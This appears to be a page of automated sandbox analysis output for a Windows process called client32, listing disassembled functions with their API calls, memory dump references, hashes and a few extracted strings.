Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 37668b69773b949e7854f7eb5468e6c090b30c5c5fa40ae3cf1bf6fc458d6a24
Instruction ID: 4b27b2bb0d909752a0ca42242ecfda2d0b55282334e66be0fd1777a4ae4accd0
Opcode Fuzzy Hash: 37668b69773b949e7854f7eb5468e6c090b30c5c5fa40ae3cf1bf6fc458d6a24
Instruction Fuzzy Hash: 2931A5B6A04204AFC724DF58E8409ABF7F8AF58314F40856EE95AD7740F771E904CB95

Function 110351A0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 11035277
__CxxThrowException@8.LIBCMT ref: 1103528C
std::exception::exception.LIBCMT ref: 1103529B
__CxxThrowException@8.LIBCMT ref: 110352B0

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
String ID:
API String ID: 959338265-0
Opcode ID: 2340c6cf811fd6038bbad158ff2a2b7b7a4440028692782664133de4ee3c3d17
Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
Opcode Fuzzy Hash: 2340c6cf811fd6038bbad158ff2a2b7b7a4440028692782664133de4ee3c3d17
Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91

Function 68C6CC90 Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C6CCCD
__CxxThrowException@8.LIBCMT ref: 68C6CCE2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 2175f97928f2d98c9c6b00acf0336bdc0142a8b505a6e75dda217fbc8f49f5de
Instruction ID: 6edb88d5ee033d41049ba5eef3bf5ef1aef13e4eba9a7ef77d3b211900b79bb1
Opcode Fuzzy Hash: 2175f97928f2d98c9c6b00acf0336bdc0142a8b505a6e75dda217fbc8f49f5de
Instruction Fuzzy Hash: 8A314D749046089FC728DF58D5818ABBBF8FF48310B508AAED95A97720E730EE00CB91

Function 68C9DF86 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 68C9DFBA
__isleadbyte_l.LIBCMT ref: 68C9DFED
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 68C9E01E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 68C9E08C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: bb386a9a8b7dce956ea780a41ef29e2aba8b7c2e21e360eb59c0b2399a488341
Instruction ID: 5f33434ebb92c1c9852f1d928252201d5fe9eb07c2a883f4883f647c0551f215
Opcode Fuzzy Hash: bb386a9a8b7dce956ea780a41ef29e2aba8b7c2e21e360eb59c0b2399a488341
Instruction Fuzzy Hash: 9431DE31A04286EFDF10DFA8D885AAE7BB5BF02314F9085E9E6749B190F731D942DB50

Function 11175085 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
__isleadbyte_l.LIBCMT ref: 111750EC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91

Function 68C65950 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898,00000000,?,?,?,?,?,68C6D68F), ref: 68C6596C
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,68C6D68F), ref: 68C6597D
SetEvent.KERNEL32(000002F8,?,?,?,?,?,68C6D68F), ref: 68C659B7
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,68C6D68F), ref: 68C659CC

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 968137a01f43d31dc8041d6e9dfd0295d835a04250361ceac0a403090395def7
Instruction ID: 0e097f86512e13c1d79a19d9177fdebb9913fdc6162f4f97596f24160c1bb92c
Opcode Fuzzy Hash: 968137a01f43d31dc8041d6e9dfd0295d835a04250361ceac0a403090395def7
Instruction Fuzzy Hash: CE21DC71D0020CDFCF40CFA8D8487AEBBF0EB49318F50806ED85AA7641E7319A46CB90

Function 110590DC Relevance: 6.1, APIs: 4, Instructions: 72timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 110590FC
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterTimetime
String ID:
API String ID: 1178526778-0
Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0

Function 68C901BE Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C90225
GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 68C90248
__freea.LIBCMT ref: 68C90252

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: StringType__freea_memset
String ID:
API String ID: 2013851047-0
Opcode ID: f9867963d31ee843873bd83f9c0f58d15e10009da9de09c90f68478d597f8d44
Instruction ID: 815060d744cc414afd13d2c66be840efbf8fb0134dda650133c1762bfa68fa95
Opcode Fuzzy Hash: f9867963d31ee843873bd83f9c0f58d15e10009da9de09c90f68478d597f8d44
Instruction Fuzzy Hash: 8211C8B264060AEEEF015FA4DCC09BE3FA9EF09358F900466FA24D7191F774C9518760

Function 1103D0B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Strings

redirect:http://127.0.0.1, xrefs: 1103D12D
/weblock.htm, xrefs: 1103D14D
:%u, xrefs: 1103D13F

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
API String ID: 3472027048-2181447511
Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2

Function 1106F130 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 11066020: SetEvent.KERNEL32 ref: 1106603B
Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1106606C
Part of subcall function 11066020: DispatchMessageA.USER32(?), ref: 11066076
Part of subcall function 11066020: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11066084

Part of subcall function 11065F00: _free.LIBCMT ref: 11065F2C

CloseHandle.KERNEL32(?,62C07B5E,?,?,?,?,?,1117E678,000000FF), ref: 1106F17E
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,1117E678,000000FF), ref: 1106F18B
_free.LIBCMT ref: 1106F1C4
_free.LIBCMT ref: 1106F1D0

Part of subcall function 1110C580: CloseHandle.KERNEL32(?,024199D0,1110CD40,?,?,?,?,?,?,?,?,1118575B,000000FF), ref: 1110C59D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message_free$CloseHandlePeek$CriticalDeleteDispatchEventSection
String ID:
API String ID: 1300075904-0
Opcode ID: c3fb6593e887c8985be483796a69c3f201445b10b41502d2bee95913a38693a9
Instruction ID: 2f6897fb5063a67ecc47f62e77f2a5239dc76439103ae6cbeadf061d0267039e
Opcode Fuzzy Hash: c3fb6593e887c8985be483796a69c3f201445b10b41502d2bee95913a38693a9
Instruction Fuzzy Hash: 8B1193B6A04716ABD750DFA4CC90B5BF7ADEB84614F104A2DE52697380DB35B900CBA1

Function 68C66830 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898,?), ref: 68C668AE
LeaveCriticalSection.KERNEL32(68CAB898), ref: 68C668C3

Strings

RESULT, xrefs: 68C66850
ERROR, xrefs: 68C6686D

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: ERROR$RESULT
API String ID: 3168844106-833402571
Opcode ID: 7396da7ec256bf90f8fb933136fb70f7e53c5028a5e6bc13bff1ff70424686b0
Instruction ID: 3acb01fbce1a14fbe0297e764ae9061df2347f4f034afcd4066ef9a923355ac8
Opcode Fuzzy Hash: 7396da7ec256bf90f8fb933136fb70f7e53c5028a5e6bc13bff1ff70424686b0
Instruction Fuzzy Hash: 5E01F9F7D002497BEB204EB4AC4196F7BA8DB052BDF840439E90AD7200F735D95583E2

Function 00401020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00401024
GetStartupInfoA.KERNEL32(?), ref: 00401079
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
ExitProcess.KERNEL32 ref: 004010A9

Memory Dump Source

Source File: 00000006.00000002.3138579220.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3138542026.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3138634850.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3138687651.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D

Function 68C67E39 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898,?,?,?,00000000), ref: 68C67EB7
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,00000000), ref: 68C67ED0

Strings

RESULT, xrefs: 68C67E40
b, xrefs: 68C67EA2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: RESULT$b
API String ID: 3168844106-4141403093
Opcode ID: 67ecd25ac47c614fa27cc7421094ab2ac35889fc7df4b78c940e847356786b54
Instruction ID: b20ea79125cc650813954da67bc6341a726850b79e1bf0b2a769169fb52008e7
Opcode Fuzzy Hash: 67ecd25ac47c614fa27cc7421094ab2ac35889fc7df4b78c940e847356786b54
Instruction Fuzzy Hash: F71136B5C0020DAEDF50CFA4D8457AEBBF4FF08308F40446AD41AE6240F7359A58DBA1

Function 68C7C170 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 68C7C190
_malloc.LIBCMT ref: 68C7C199

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 68C7C1B0

Part of subcall function 68C7BA20: __strdup.LIBCMT ref: 68C7BA3A

_free.LIBCMT ref: 68C7C1C2

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharHeapMultiWide$AllocateErrorFreeLast__strdup_free_malloc
String ID:
API String ID: 2344877359-0
